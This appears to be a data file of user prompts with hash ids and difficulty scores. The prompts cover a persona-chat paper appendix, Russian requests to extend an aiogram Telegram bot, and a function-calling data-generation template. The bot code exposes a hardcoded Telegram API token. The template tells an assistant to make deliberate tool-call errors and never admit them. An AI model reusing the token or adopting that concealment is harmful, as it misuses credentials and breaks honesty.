Question: Are the responses of users consistent in the information they provide throughout the conversation? (a) Yes. (b) No.
Conversation: {dialogue} Answer:
G-Eval
Coherence
You will be given a pair of user personas. You will then be given one conversation between this persona pair.
Your task is to rate the conversation on one metric.
Please make sure you read and understand these instructions carefully. Please keep this document open while reviewing, and refer to it as needed.
Evaluation Criteria:
Coherence (1-5) - the collective quality of all utterances. We align this dimension with the Document Understanding Conference (DUC) quality question of structure and coherence (https://duc.nist.gov/duc2007/quality-questions.txt), whereby "the conversation should be well-structured and well-organized. The conversation should not just be a heap of related information, but should build from utterance to a coherent body of conversation about a topic."
Evaluation Steps:
1. Read and understand the given conversation between the pair of user personas.
2. Evaluate the conversation based on the coherence of the utterances.
3. Rate the conversation on a scale of 1 to 5, with 5 being the highest coherence and 1 being the lowest coherence.
4. Justify the rating by referring to specific aspects of the conversation that demonstrate its coherence or lack thereof.
Example:
Personas: {personas}
Conversation: {dialogue}
Evaluation Form (scores ONLY):
- Coherence:
LLM-Faithfulness
Inference
Instruction: Select User {user} persona attributes that are directly inferred from this conversation.
Contradiction
Instruction: Select User {user} persona attributes that strongly contradict this conversation.
Table 14: Prompt Templates in LLM-based Conversation Quality Evaluators. Variables enclosed in {} are filled when the template is populated.
Results of this evaluation are presented in Table 15. We observe that SPC consistently outperforms PC across all the dimensions we evaluate. The superiority of SPC is more prominent when using GPT-Score, for which each evaluated criterion shows an average improvement of at least 23 points.
Evaluator Criteria PC SPC SPC Iter 1 FED Faithfulness
LLM-Eval Lin and Chen (2023) Content 81.96 88.84 88.71 87.61 88.67
Grammar 87.12 93.64 93.68 93.09 93.56
Relevance 86.82 94.16 93.81 92.88 93.79
Appropriateness 86.99 95.84 96.17 95.68 96.19
GPT-Score Fu et al. (2023) Fluency 67.04 98.89 96.28 96.65 97.83
Consistent 3.47 64.25 50.43 43.45 48.69
Coherent 69.41 100 100 98.99 100
Depth 5.40 37.36 29.30 19.40 29.01
Diversity 72.98 96.42 94.02 92.79 94.11
Likeable 36.53 91.04 93.11 91.90 87.98
G-Eval Liu et al. (2023) Relevance (1-5) 2.288 2.992 2.986 2.941 2.99
Fluency (1-3) 1.928 2.002 2 1.998 1.999
Consistent (1-5) 1.736 2.651 2.587 2.449 2.496
Coherent (1-5) 2.505 2.997 2.997 2.991 2.998
Faithfulness (1-5) 1.754 2.959 2.8801 2.79 2.868
Table 15: Results of Automatic Evaluations of Synthetic-Persona-Chat and Persona-Chat. The "FED" column is the evaluation of the dataset generated without FED expert and the column "Faithfulness" is the evaluation results of the dataset generated without the faithfulness expert in the Critic.
B.2 Human Evaluation
We run a human evaluation of the performance of our method via a crowdsourcing platform. We conduct a Turing test, and a faithfulness study - both of which we describe in more details in the following subsections - at the end of every iteration of the generation of SPC.
Turing Test
We randomly select 200 user pairs from PC. For each example, we show the annotators the user pair, together with the corresponding conversations from PC and SPC, and ask them to select the conversation that was synthetically generated. We show an example of this crowdsourcing task in Figure 7. The results of the Turing test are available in Table 16. We report the losing rate of SPC in Turing test, and Fleiss’ Kappa to assess the inter-rater agreement. The agreement falls into the fair to moderate agreement bucket.
Refer to caption
Figure 7: Preview of the Turing Test Task on the Crowdsourcing Platform
Conversation Source % Lose κ # annotators
SPC Iter 1 17.2 0.41 50
SPC Iter 2 18.5 0.48 40
SPC Iter 3 8.8 0.22 11
SPC Iter 3* 8.04 0.56 24
SPC (LLM2) 11.5 0.49 36
Table 16: Turing test results on a sample of 200 conversations. The first column shows the percentage of SPC losing compared to PC in the Turing test. Note that the last iteration (3) of SPC is an evaluation of the segment of conversations based on the extended persona set.
Faithfulness
We present the annotators with a conversation, and a set of options of persona attributes. The annotators are asked to select the user persona attributes they would infer from the conversation. Figure 8 shows a sample of the annotation task in this study. The options include the persona attributes of the speakers in the conversation, and a set of distractor persona attributes. We created distractor persona attributes using different strategies to cover different difficulty levels. For a persona attribute set Π, we create a set ¬Π of distractor persona attributes as:
Negated personas We prompt an LLM to negate persona attributes. For example, the negation of persona attribute "I like vegetables" is "I don’t like vegetables".
Random personas We randomly select persona attributes from user profiles in other conversations in the dataset.
Contradicting personas We prompt an LLM to generate a persona attribute which contradicts the users’ personas.
Each entry of this task includes 8 user persona attributes as options, where 4 of them are the real persona attributes, and the other 4 are distractors. We evaluate the precision of the human annotators, and report it as a proxy to the conversation faithfulness in Table 3.
Refer to caption
Figure 8: Preview of the Faithfulness Task on the Crowdsourcing Platform.
Appendix C Ablation Studies
We run several ablation studies to evaluate the importance of individual components in our framework. We begin by analyzing the effect of the persona expansion module. We then review the impact of each expert in the mixture forming our Critic.
C.1 Persona Expansion
We assess the importance of the query-based persona expansion module introduced in Section 3.1.1. Similarly to the experiment outlined in Section 4.1, we run the persona expansion on two datasets: Wikipedia and PC. The results of this experiment are presented in Table 17. We designate the persona expansions without the inducted query set (Q) as ‘Wikipedia-0’, and ‘PC-0’, and run the same number of iterations for each (100 iterations). We observe that PC-0 includes 4,477 new persona attributes, 20 percent less than PC. The difference in the number of newly generated persona attributes is more pronounced in the case of Wikipedia, where Wikipedia-0 consists of 4,742 persona attributes, 50 percent less than Wikipedia+. This trend is also observed in the number of persona clusters, with PC-0 and Wikipedia-0 having 6% and 49% less clusters respectively. This pattern suggests the effectiveness of the query-based persona expansion in maintaining the diversity of the persona set. Furthermore, the average persona attribute length in PC-0 is 11.38 tokens, which is 28% less than SPC. This reduction points to less detailed and specific persona attributes. In contrast, the expansion in ‘Wikipedia-0’ exhibits similar average persona attribute lengths compared to ‘Wikipedia+’.
Dataset PC SPC PC-0 Wikipedia Wikipedia+ Wikipedia-0
# Persona Attributes 4,723 10,371 9,200 8,768 18,293 13,510
# Clusters 323 553 520 408 986 502
InterCluster-Dist 0.836 0.863 0.842 0.816 0.85 0.83
AVG length 7.65 15.9* 11.38* 10.45 15.2* 15.2*
Table 17: Evaluation of the Expanded Persona Attribute Sets. The numbers with *′′ indicate the metric value on the newly generated persona attributes, in contrast to the initial persona attributes.
C.2 Conversation Quality
We analyze the effect of the experts within our Critic. We remove each expert, and generate a dataset using one iteration of our framework. We compare the resulting datasets against the output of the first iteration of SPC. We use the evaluators introduced in B.1. The results of this experiment are summarized in Table 15. We observe that the exclusion of the experts results in worse performance according to most criteria: 3 out of 4 in LLM-Eval, 4 out of 6 in GPT-Score, and 3 out of 5 in G-Eval.
C.3 Faithfulness
We ablate the faithfulness critic, and generate a dataset that we compare against SPC. We compare these datasets both automatically, using human annotators (Turing Test), and using a prompted LLM (LLM-Evaluator). We describe this study in more details below.
Turing Test
We run a human study to compare a small subset of conversations created without the faithfulness expert against their equivalent created with that expert. This experiment process is similar to 4.3 and it is conducted for 200 conversations. The precision decreases from 78.0% to 66.0% without this critic, highlighting its effectiveness in eliminating conversations with contradictory information about user personas. The recall decreases from 36.0% to 23.0%, demonstrating a higher reflection of personas in the conversations in the presence of the faithfulness expert.
LLM-Evaluator
We extend our comparison to the entire dataset using an LLM as an annotator, following He et al. (2023); Bansal and Sharma (2023); Chiang and yi Lee (2023). Table 18 shows the faithfulness of the conversations generated in the first iteration without the faithfulness expert. The templates used in the LLM-based annotators are described in Table 15 in the rows with "LLM-Faithfulness" as their evaluator. Note that the annotator-based LLM is created using a different LLM, gpt-3.5-turbo Brown et al. (2020a); Ouyang et al. (2022), than the LLM used for dataset generation.
LLM Evaluator (%) Human Evaluator (%)
Absent Component Inference Contradiction Precision Recall
None 33.2 24.5 78.5 36.4
Faithfulness 32.7 28.8 66.1 23.1
FED 31.7 28.5 N/A N/A
Table 18: Faithfulness of Generated Conversation Datasets Using the Framework While Eliminating Each Component. The first row represents the framework without removing any component, equivalent to the first iteration of Synthetic-Persona-Chat.
C.4 Next Utterance Prediction
We follow the experimental setting described in section 4.2, and compare the performance of various next utterance prediction models trained on SPC against the same models trained on datasets created in the absence of certain experts.
When using the IR Baseline as the next utterance prediction method, we observee that its highest performance of 39% hit@1 occurs when the FED critic is absent during dataset creation. This outcome aligns with FED’s emphasis on conversation quality, excluding persona-related aspects. Conversely, the Transformer Ranker, capable of understanding intricate concepts, achieves its peak performance of 13.9% hit@1 when none of the experts are absent. This result supports the inclusion of both FED and the Faithfulness expert in the model architecture. In generative models, the absence of FED impacts the next utterance prediction model the most, leading to a notable decline in performance (e.g. −12% hit@1, −9% BLEU, −10% ROUGE). This observation underscores the crucial role played by FED in enhancing the generative capabilities of the model.
Absent Component Faithfulness FED None
Method Metric None Persona % Change None Persona % Change None Persona % Change
IR Baseline hit@1 18.7 38.7 +106 19.0 39.0 +105 18.9 38.7 +105
Transformer (Ranker) hit@1 10.9 13.5 +24 10.7 13.6 +27 12.4 13.9 +11
hit@1 8.9 7.4 -16 8.4 7.4 -12 8.2 7.0 -14
Transformer Perplexity 204 214 +5 174 185 +6 203 210 +3
(Generator) BLUE 0.11 0.10 -11 0.11 0.10 -9 0.10 0.08 -15
ROUGE 0.14 0.15 -12 0.14 0.12 -10 0.13 0.10 -17
Table 19: Results of the Next Utterance Prediction Experiment in the Ablation Study. The numbers in the table represent the performance of the trained model on the test portion of the Persona-Chat dataset.
Depending on this paper genrate two personas, expand the persona, match them and generate the conversation in Hinglish only.
|
d1dee26e286a2e730089280e481290bf
|
{
"intermediate": 0.4146990478038788,
"beginner": 0.3857140839099884,
"expert": 0.19958680868148804
}
|
45,684
|
Привет! давай добавим в моего бота: 1. нумерацию ответов в личном кабинете 2. Реализацию кнопки "Изменить ответ". Вот код: from aiogram import Bot, Dispatcher, executor, types
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters.state import State, StatesGroup
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardButton, InlineKeyboardMarkup
import aiosqlite
import asyncio
API_TOKEN = '6306133720:AAH0dO6nwIlnQ7Hbts6RfGs0eI73EKwx-hE'
bot = Bot(token=API_TOKEN)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
class Form(StatesGroup):
choosing_action = State()
answer_name = State()
answer_birthday = State()
answer_skills = State()
answer_hobbies = State()
personal_account = State()
edit_answer = State()
async def create_db():
async with aiosqlite.connect('memory_page.db') as db:
await db.execute('''CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
last_question_idx INTEGER DEFAULT 0)''')
await db.execute('''CREATE TABLE IF NOT EXISTS answers (
id INTEGER PRIMARY KEY AUTOINCREMENT,
user_id INTEGER,
question TEXT,
answer TEXT,
FOREIGN KEY (user_id) REFERENCES users (id))''')
await db.commit()
async def add_user(user_id: int, username: str):
async with aiosqlite.connect('memory_page.db') as db:
cursor = await db.execute('SELECT id FROM users WHERE id = ?', (user_id,))
user_exists = await cursor.fetchone()
if user_exists:
await db.execute('UPDATE users SET username = ? WHERE id = ?', (username, user_id))
else:
await db.execute('INSERT INTO users (id, username) VALUES (?, ?)', (user_id, username))
await db.commit()
@dp.message_handler(commands="start", state="*")
async def cmd_start(message: types.Message):
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Сгенерировать био"))
markup.add(KeyboardButton("Личный кабинет"))
user_id = message.from_user.id
username = message.from_user.username or "unknown"
await add_user(user_id, username)
await message.answer("Выберите действие:", reply_markup=markup)
await Form.choosing_action.set()
@dp.message_handler(lambda message: message.text == "В меню", state="*")
async def back_to_menu(message: types.Message):
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Сгенерировать био"))
markup.add(KeyboardButton("Личный кабинет"))
await message.answer("Вернули вас в меню. Выберите действие", reply_markup=markup)
await Form.choosing_action.set()
questions = [
"Имя",
"Дата рождения",
"Ваши умения",
"Ваши увлечения"
]
async def save_answer(user_id: int, question: str, answer: str, question_idx: int):
async with aiosqlite.connect('memory_page.db') as db:
# Сохраняем ответ
await db.execute('INSERT INTO answers (user_id, question, answer) VALUES (?, ?, ?)',
(user_id, question, answer))
# Обновляем индекс последнего вопроса пользователя
await db.execute('UPDATE users SET last_question_idx = ? WHERE id = ?', (question_idx, user_id))
await db.commit()
async def set_next_question(user_id: int, question_idx: int):
state = dp.current_state(user=user_id)
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("В меню"))
if question_idx == 0:
await state.set_state(Form.answer_name.state)
await bot.send_message(user_id, questions[0],reply_markup=markup)
elif question_idx == 1:
await state.set_state(Form.answer_birthday.state)
await bot.send_message(user_id, questions[1],reply_markup=markup)
elif question_idx == 2:
await state.set_state(Form.answer_skills.state)
await bot.send_message(user_id, questions[2],reply_markup=markup)
elif question_idx == 3:
await state.set_state(Form.answer_hobbies.state)
await bot.send_message(user_id, questions[3],reply_markup=markup)
else:
await state.reset_state() # Сброс состояния, если все вопросы отвечены
await bot.send_message(user_id, "Вы ответили на все вопросы. Ответы сохранены.",reply_markup=markup)
@dp.message_handler(lambda message: message.text == "Сгенерировать био", state=Form.choosing_action)
async def generate_bio(message: types.Message):
user_id = message.from_user.id
async with aiosqlite.connect('memory_page.db') as db:
# Правильный запрос для получения last_question_idx пользователя
cursor = await db.execute('SELECT last_question_idx FROM users WHERE id = ?', (user_id,))
result = await cursor.fetchone()
if result and result[0] > 0:
# Начать с следующего вопроса на основе last_question_idx
await set_next_question(user_id, result[0])
else:
# Если нет записей или last_question_idx = 0, начинаем с первого вопроса
await set_next_question(user_id, 0)
@dp.message_handler(state=Form.answer_name)
async def process_name(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[0], message.text,1)
await Form.next()
await message.answer(questions[1])
@dp.message_handler(state=Form.answer_birthday)
async def process_birthday(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[1], message.text,2)
await Form.next()
await message.answer(questions[2])
@dp.message_handler(state=Form.answer_skills)
async def process_skills(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[2], message.text,3)
await Form.next()
await message.answer(questions[3])
@dp.message_handler(state=Form.answer_hobbies)
async def process_hobbies(message: types.Message, state: FSMContext):
# Сохраняем последний ответ и завершаем сессию
await save_answer(message.from_user.id, questions[3], message.text,4)
await state.finish()
await message.answer("Спасибо за ответы! Ваши ответы сохранены.")
await cmd_start(message)
@dp.message_handler(lambda message: message.text == "Личный кабинет", state=Form.choosing_action)
async def personal_account(message: types.Message):
user_id = message.from_user.id
answers_text = "Ваши ответы:\n"
async with aiosqlite.connect('memory_page.db') as db:
cursor = await db.execute('SELECT question, answer FROM answers WHERE user_id=? ORDER BY id', (user_id,))
answers = await cursor.fetchall()
for question, answer in answers:
answers_text += f"{question}: {answer}\n"
if answers_text == "Ваши ответы:\n":
answers_text += "Пока нет ответов."
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Изменить ответ"))
markup.add(KeyboardButton("Заполнить заново"))
markup.add(KeyboardButton("В меню"))
await message.answer(answers_text, reply_markup=markup)
await Form.personal_account.set()
@dp.message_handler(lambda message: message.text == "Изменить ответ", state=Form.personal_account)
async def change_answer(message: types.Message):
await message.answer("Введите номер вопроса, на который хотите изменить ответ:")
await Form.edit_answer.set()
@dp.message_handler(lambda message: message.text == "Заполнить заново", state=Form.personal_account)
async def refill_form(message: types.Message):
markup = InlineKeyboardMarkup().add(InlineKeyboardButton("Да", callback_data="confirm_refill"))
await message.answer("Вы уверены, что хотите начать заново? Все текущие ответы будут удалены.", reply_markup=markup)
@dp.callback_query_handler(lambda c: c.data == 'confirm_refill', state=Form.personal_account)
async def process_refill(callback_query: types.CallbackQuery):
user_id = callback_query.from_user.id
async with aiosqlite.connect('memory_page.db') as db:
# Удаление ответов пользователя
await db.execute('DELETE FROM answers WHERE user_id=?', (user_id,))
await db.commit()
# Сброс индекса последнего вопроса на 0, чтобы начать заново
await db.execute('UPDATE users SET last_question_idx = 0 WHERE id = ?', (user_id,))
await db.commit()
await bot.answer_callback_query(callback_query.id)
await cmd_start(callback_query.message)
async def main():
await create_db()
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
executor.start_polling(dp, skip_updates=True)
|
521c06d098e9775bdf754d30536231dd
|
{
"intermediate": 0.3111448585987091,
"beginner": 0.5607836246490479,
"expert": 0.12807154655456543
}
|
45,685
|
Привет! Давай реализуем функцию "Изменить ответ". Она должна работать по следующему принципу: пользователь вводит номер вопроса, после чего бот спрашивает, какой новый ответ хочет дать пользователь. Вот код: from aiogram import Bot, Dispatcher, executor, types
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters.state import State, StatesGroup
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardButton, InlineKeyboardMarkup
import aiosqlite
import asyncio
API_TOKEN = '6306133720:AAH0dO6nwIlnQ7Hbts6RfGs0eI73EKwx-hE'
bot = Bot(token=API_TOKEN)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
class Form(StatesGroup):
choosing_action = State()
answer_name = State()
answer_birthday = State()
answer_skills = State()
answer_hobbies = State()
personal_account = State()
edit_answer = State()
async def create_db():
async with aiosqlite.connect('memory_page.db') as db:
await db.execute('''CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
last_question_idx INTEGER DEFAULT 0)''')
await db.execute('''CREATE TABLE IF NOT EXISTS answers (
id INTEGER PRIMARY KEY AUTOINCREMENT,
user_id INTEGER,
question TEXT,
answer TEXT,
FOREIGN KEY (user_id) REFERENCES users (id))''')
await db.commit()
async def add_user(user_id: int, username: str):
async with aiosqlite.connect('memory_page.db') as db:
cursor = await db.execute('SELECT id FROM users WHERE id = ?', (user_id,))
user_exists = await cursor.fetchone()
if user_exists:
await db.execute('UPDATE users SET username = ? WHERE id = ?', (username, user_id))
else:
await db.execute('INSERT INTO users (id, username) VALUES (?, ?)', (user_id, username))
await db.commit()
@dp.message_handler(commands="start", state="*")
async def cmd_start(message: types.Message):
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Сгенерировать био"))
markup.add(KeyboardButton("Личный кабинет"))
user_id = message.from_user.id
username = message.from_user.username or "unknown"
await add_user(user_id, username)
await message.answer("Выберите действие:", reply_markup=markup)
await Form.choosing_action.set()
@dp.message_handler(lambda message: message.text == "В меню", state="*")
async def back_to_menu(message: types.Message):
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Сгенерировать био"))
markup.add(KeyboardButton("Личный кабинет"))
await message.answer("Вернули вас в меню. Выберите действие", reply_markup=markup)
await Form.choosing_action.set()
questions = [
"Имя",
"Дата рождения",
"Ваши умения",
"Ваши увлечения"
]
async def save_answer(user_id: int, question: str, answer: str, question_idx: int):
async with aiosqlite.connect('memory_page.db') as db:
# Сохраняем ответ
await db.execute('INSERT INTO answers (user_id, question, answer) VALUES (?, ?, ?)',
(user_id, question, answer))
# Обновляем индекс последнего вопроса пользователя
await db.execute('UPDATE users SET last_question_idx = ? WHERE id = ?', (question_idx, user_id))
await db.commit()
async def set_next_question(user_id: int, question_idx: int):
state = dp.current_state(user=user_id)
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("В меню"))
if question_idx == 0:
await state.set_state(Form.answer_name.state)
await bot.send_message(user_id, questions[0],reply_markup=markup)
elif question_idx == 1:
await state.set_state(Form.answer_birthday.state)
await bot.send_message(user_id, questions[1],reply_markup=markup)
elif question_idx == 2:
await state.set_state(Form.answer_skills.state)
await bot.send_message(user_id, questions[2],reply_markup=markup)
elif question_idx == 3:
await state.set_state(Form.answer_hobbies.state)
await bot.send_message(user_id, questions[3],reply_markup=markup)
else:
await state.reset_state() # Сброс состояния, если все вопросы отвечены
await bot.send_message(user_id, "Вы ответили на все вопросы. Ответы сохранены.",reply_markup=markup)
@dp.message_handler(lambda message: message.text == "Сгенерировать био", state=Form.choosing_action)
async def generate_bio(message: types.Message):
user_id = message.from_user.id
async with aiosqlite.connect('memory_page.db') as db:
# Правильный запрос для получения last_question_idx пользователя
cursor = await db.execute('SELECT last_question_idx FROM users WHERE id = ?', (user_id,))
result = await cursor.fetchone()
if result and result[0] > 0:
# Начать с следующего вопроса на основе last_question_idx
await set_next_question(user_id, result[0])
else:
# Если нет записей или last_question_idx = 0, начинаем с первого вопроса
await set_next_question(user_id, 0)
@dp.message_handler(state=Form.answer_name)
async def process_name(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[0], message.text,1)
await Form.next()
await message.answer(questions[1])
@dp.message_handler(state=Form.answer_birthday)
async def process_birthday(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[1], message.text,2)
await Form.next()
await message.answer(questions[2])
@dp.message_handler(state=Form.answer_skills)
async def process_skills(message: types.Message, state: FSMContext):
# Сохраняем ответ сразу после получения
await save_answer(message.from_user.id, questions[2], message.text,3)
await Form.next()
await message.answer(questions[3])
@dp.message_handler(state=Form.answer_hobbies)
async def process_hobbies(message: types.Message, state: FSMContext):
# Сохраняем последний ответ и завершаем сессию
await save_answer(message.from_user.id, questions[3], message.text,4)
await state.finish()
await message.answer("Спасибо за ответы! Ваши ответы сохранены.")
await cmd_start(message)
@dp.message_handler(lambda message: message.text == "Личный кабинет", state=Form.choosing_action)
async def personal_account(message: types.Message):
user_id = message.from_user.id
answers_text = "Ваши ответы:\n"
async with aiosqlite.connect('memory_page.db') as db:
cursor = await db.execute('SELECT question, answer FROM answers WHERE user_id=? ORDER BY id', (user_id,))
answers = await cursor.fetchall()
for idx, (question, answer) in enumerate(answers, start=1):
answers_text += f"{idx}. {question}: {answer}\n"
if answers_text == "Ваши ответы:\n":
answers_text += "Пока нет ответов."
markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(KeyboardButton("Изменить ответ"))
markup.add(KeyboardButton("Заполнить заново"))
markup.add(KeyboardButton("В меню"))
await message.answer(answers_text, reply_markup=markup)
await Form.personal_account.set()
@dp.message_handler(lambda message: message.text == "Изменить ответ", state=Form.personal_account)
async def change_answer(message: types.Message):
await message.answer("Введите номер вопроса, на который хотите изменить ответ:")
await Form.edit_answer.set()
@dp.message_handler(lambda message: message.text == "Заполнить заново", state=Form.personal_account)
async def refill_form(message: types.Message):
markup = InlineKeyboardMarkup().add(InlineKeyboardButton("Да", callback_data="confirm_refill"))
await message.answer("Вы уверены, что хотите начать заново? Все текущие ответы будут удалены.", reply_markup=markup)
@dp.callback_query_handler(lambda c: c.data == 'confirm_refill', state=Form.personal_account)
async def process_refill(callback_query: types.CallbackQuery):
user_id = callback_query.from_user.id
async with aiosqlite.connect('memory_page.db') as db:
# Удаление ответов пользователя
await db.execute('DELETE FROM answers WHERE user_id=?', (user_id,))
await db.commit()
# Сброс индекса последнего вопроса на 0, чтобы начать заново
await db.execute('UPDATE users SET last_question_idx = 0 WHERE id = ?', (user_id,))
await db.commit()
await bot.answer_callback_query(callback_query.id)
await cmd_start(callback_query.message)
async def main():
await create_db()
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
executor.start_polling(dp, skip_updates=True)
|
5ff4abaf866de06ecebd76ada2581712
|
{
"intermediate": 0.3103484809398651,
"beginner": 0.5988892316818237,
"expert": 0.09076227247714996
}
|
45,686
|
Make changes to the below prompt structure to match the arxiv paper:
Prompt =
Domain: Calculus
RULES FOR FUNCTION CALLING:
Function definition should include a clear schema or structure for the expected input data.
Function's input parameters should be well-defined, with clear descriptions and data types.
Function should be designed to perform a specific task that can be effectively handled.
The user's input should be analysed to determine the relevant function and its required arguments.
Output should strictly adhere to the provided schema, including required fields and correct data types.
You should handle any potential ambiguities or missing information in the user's input gracefully.
You should be capable of understanding and generating output for multiple function definitions simultaneously.
Handle any formatting or preprocessing requirements for the function inputs or outputs.
EXAMPLE:
{\n "conversations": [\n {"user": "asks something and then requests assistant to please call the appropriate functions to perform these calculations and provide me with the results?",\n "assistant": "<tool_call>{"function": function_name, "arguments":dict of arguments}</tool_call> can call multiple functions depening upon users query ",\n "tool": "<tool_response>{"name": function_name, "content": function_output}</tool_response> similar to assistant will have multiple response based on calls , for error function it gives its error and not output",\n "assistant": "here assistant explains what output they gave based on user's query and also tells user about the error in the function response "\n },
{"user": "here user points out the mistake the assistant made while calling functions",\n "assistant": "<tool_call>{"function": function_name, "arguments": dict of args}</tool_call>here similarly assistant corrects its mistake and then again calls its once again",\n "tool": "<tool_response>{\"name\":function_name, \"content\": function_output}</tool_response>tool response for corrected function calls only",\n "assistant": "here assistant ponders what was that mistake and how he fixed it and what impact it may had"\n }\n ]\n}
RULES FOR PRODUCING OUTPUT WITH FUNCTION CALLING:
The output should be a valid JSON object with a "conversations" property, which is an array of conversation objects.
Each conversation object should have the following properties:
"user": The user's natural language query or request.
"assistant": The assistant's response, which may include function calls and their results.
"tool" (optional): The output of the called function(s), enclosed within <tool_response> tags.
For the initial response, the assistant should attempt to call the relevant function(s) based on the user's request.
The function call should be enclosed within <tool_call> tags, with the following structure: <tool_call>{"function": "function_name", "arguments": {"arg1": value1, "arg2": value2, ...}}</tool_call>
The assistant should intentionally make a mistake in one of the function calls, - mistakes can be calling wrong function or using invalid datatypes or making small typos etc. [come up with some creativity]
IF you attempt to call a function with the wrong data type based on the user's input, you should return an error message indicating the data type mismatch instead of providing the correct result.
IF you call the correct function but with the wrong arguments, you should return an error message indicating the incorrect arguments instead of providing the correct result.
IF you initially call the wrong function based on the user's input, the user will point out the mistake. In this case, you should acknowledge the correction and call the correct function without requiring additional input from the user.
IF you call the correct function but with the wrong arguments, you should realize the mistake on your own and call the function again with the correct arguments, without requiring the user to point out the mistake.
Assistant MUST NOT acknowledge that it made any mistake.
The user MUST point out the mistake made by the assistant in the function call.
In the subsequent response, the assistant should:
Correct the mistake in the function call, ensuring proper argument naming and casing.
Enclose the corrected function call within <tool_call> tags.
Include the output of the corrected function call within <tool_response> tags.
Provide an explanation acknowledging the correction and the importance of consistent argument naming and casing.
The assistant's responses should be natural language explanations, providing context and clarification for the function calls and their outputs.
The JSON output should be well-formatted, with proper indentation and escaping of special characters.
The conversation flow should be logical and consistent, with the assistant demonstrating the ability to understand and adapt to the user's feedback and corrections.
INSTRUCTION:
Create a conversation between User and Assistant where user will ask some query then Assistant must use given function and call then them Must Follow RULES FOR PRODUCING OUTPUT WITH FUNCTION CALLING and must be json.
"""
Arxiv =
License: CC BY 4.0
arXiv:2312.10007v1 [cs.CL] 15 Dec 2023
Faithful Persona-based Conversational Dataset Generation with Large Language Models
Pegah Jandaghi
University of Southern California <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
&XiangHai Sheng Google <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
&Xinyi Bai Google <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
\ANDJay Pujara
Information Sciences Institute <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
&Hakim Sidahmed Google Research <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS> Work done during an internship at Google Inc., Mountain View, USA
Abstract
High-quality conversational datasets are essential for developing AI models that can communicate with users. One way to foster deeper interactions between a chatbot and its user is through personas, aspects of the user’s character that provide insights into their personality, motivations, and behaviors. Training Natural Language Processing (NLP) models on a diverse and comprehensive persona-based dataset can lead to conversational models that create a deeper connection with the user, and maintain their engagement. In this paper, we leverage the power of Large Language Models (LLMs) to create a large, high-quality conversational dataset from a seed dataset. We propose a Generator-Critic architecture framework to expand the initial dataset, while improving the quality of its conversations. The Generator is an LLM prompted to output conversations. The Critic consists of a mixture of expert LLMs that control the quality of the generated conversations. These experts select the best generated conversations, which we then use to improve the Generator. We release Synthetic-Persona-Chat1
1
Dataset available at https://github.com/google-research-datasets/Synthetic-Persona-Chat, consisting of 20k conversations seeded from Persona-Chat Zhang et al. (2018). We evaluate the quality of Synthetic-Persona-Chat and our generation framework on different dimensions through extensive experiments, and observe that the losing rate of Synthetic-Persona-Chat against Persona-Chat during Turing test decreases from 17.2% to 8.8% over three iterations.
1 Introduction
Every person is a story. Systems that interact with people must understand their underlying stories to effectively engage with them. Unfortunately, many existing datasets used for training conversational agents do not sufficiently model their users. Personas - abstract user representations that express the “story” of a person based on their background and preferences - have been widely used for human-centered design in a variety of domains, including marketing, system design, and healthcare Pruitt and Grudin (2003b). Prior persona-based conversational datasets, like Persona-Chat (PC) Zhang et al. (2018), suffer from several limitations, such as small size, static dialogues that cannot easily be updated with new topics, irrelevant utterances, and contradictory persona attributes Wu et al. (2019). In this paper, we propose a novel framework for generating large, dynamic, persona-based conversational datasets that capture the breadth and depth of human experience.
Personas Pruitt and Grudin (2003a); Cooper and Saffo (1999) have been widely used in a variety of domains and applications, including creating narratives for patients and sharing educational messages in healthcare Massey et al. (2021), targeting users in marketing van Pinxteren et al. (2020); Fuglerud et al. (2020), and communicating with workers in management Claus (2019). Conversational agents use personas to generate more interesting and engaging conversations with their users Zhou et al. (2019); Shum et al. (2019).
Creating persona-based datasets is difficult: the process is labor-intensive, the outputs must be updated to reflect current events and new concepts, and there are often quality concerns. Existing persona-based datasets have resulted from labor-intensive data collection processes Zhang et al. (2018); Zhong et al. (2020) involving humans to create or validate personas, create fictional persona-based conversations, and ensure the conversations are coherent. Moreover, even after these datasets are created, it is difficult to update them with the latest topics Lee et al. (2022), such as current events, new concepts, products, or social trends Lazaridou et al. (2021). Finally, existing persona-based datasets do not guarantee faithfulness, a criterion we introduce to describe the alignment between participants’ utterances and their personas.
